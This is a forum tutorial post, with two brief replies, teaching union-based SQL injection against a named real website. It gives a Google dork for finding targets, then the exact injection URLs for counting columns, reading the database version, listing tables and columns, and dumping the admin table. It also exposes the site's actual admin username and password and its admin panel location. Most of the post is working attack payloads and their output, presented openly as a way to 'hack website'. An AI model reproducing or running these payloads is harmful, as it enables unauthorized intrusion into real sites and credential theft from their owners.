SQLi Injection

[st@4sc43@m]

This is my FIRST TUT ABOUT SQL INJECTION...

first start with google...

try the dork :

inurl:index.php?id=

or follow my test link

http://www.leadacidbatteryinfo.org/newsdetail.php?id

you should be getting the below error

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 3

to find the no of tables

http://www.leadacidbatteryinfo.org/newsdetail.php?id=10 order by 1-- >>>> no error
http://www.leadacidbatteryinfo.org/newsdetail.php?id=10 order by 2--
http://www.leadacidbatteryinfo.org/newsdetail.php?id=10 order by 3--
http://www.leadacidbatteryinfo.org/newsdetail.php?id=10 order by 4--
http://www.leadacidbatteryinfo.org/newsdetail.php?id=10 order by 5--
http://www.leadacidbatteryinfo.org/newsdetail.php?id=10 order by 6--
http://www.leadacidbatteryinfo.org/newsdetail.php?id=10 order by 7--
http://www.leadacidbatteryinfo.org/newsdetail.php?id=10 order by 8--
http://www.leadacidbatteryinfo.org/newsdetail.php?id=10 order by 9--
http://www.leadacidbatteryinfo.org/newsdetail.php?id=10 order by 10--
http://www.leadacidbatteryinfo.org/newsdetail.php?id=10 order by 11--
http://www.leadacidbatteryinfo.org/newsdetail.php?id=10 order by 12-- >>>>>getting error

Unknown column '12' in 'order clause'

so in this website there is only 11 columns are there .

next it how to find the vunl tables



http://www.leadacidbatteryinfo.org/newsdetail.php?id=-10 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11--

8
3
4
5

so next is we are finding version of the SQL server



http://www.leadacidbatteryinfo.org/newsdetail.php?id=-10 UNION SELECT 1,2,3,4,5,6,7,@@version,9,10,11--

5.1.52

If the version is less then 5.0 then it is vunl to blind sql attack . now i my case it is more then 5.0


NEXT WE WILL FIND THE TABLE NAMES

http://www.leadacidbatteryinfo.org/newsdetail.php?id=-10 union all select 1,2,3,4,5,6,7,table_name,9,10,11 from information_schema.tables--

CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
ENGINES
EVENTS
FILES
GLOBAL_STATUS
GLOBAL_VARIABLES
KEY_COLUMN_USAGE
PARTITIONS
PLUGINS
PROCESSLIST
PROFILING
REFERENTIAL_CONSTRAINTS
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
SESSION_STATUS
SESSION_VARIABLES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
pdigclicks
pdigengine
pdigexcludes
pdigincludes
pdigkeywords
pdiglogs
pdigsite_page
pdigsites
pdigspider
pdigtempspider
tbladmin>>>>>>>>>>>>>WHAT WE FINDING <<<<<<<<<<<<<<Admin table is needed for login as a admin this is the example only we need admin table>>>>>>>>>>>>
tblbanner
tblbanner_page
tblfaq
tblncategory
tblnews

go to this website and convert the tbladmin tp ACII
http://www.cs.carleton.edu/faculty/adalal/teaching/f05/107/applets/ascii.html

(116,98,108,97,100,109,105,110)

now our next command is :

http://www.leadacidbatteryinfo.org/newsdetail.php?id=-10 UNION SELECT 1,2,3,4,5,6,7,group_concat(column_name),9,10,11 from information_schema.columns where table_name= CHAR(116,98,108,97,100,109,105,110)--

adminid,username,password,dom

now we are gettings column name

now for getting data from column:

http://www.leadacidbatteryinfo.org/newsdetail.php?id=-10 UNION SELECT 1,2,3,4,5,6,7,group_concat(username,0x3a,password),9,10,11 from tbladmin

ishir:ishir123

now we have to find admin panel or user login
there is the so many software and online admin finder but i searched manually and found

http://www.leadacidbatteryinfo.org/admin/

as a admin page

now in last this tutorial is not complete

but it's give the way how to hack website
and sql injection

if you've any question releated SQL injection then ask me i will try my best

I WILL EXPLAIN EACH COMMAND IN MY NEXT TUT

Please Comment

Adios Amigos

[Admin]

nice article let me try if it is got.

[st@4sc43@m]

thank you hope i will post more so that all can learn security

[Sponsored content]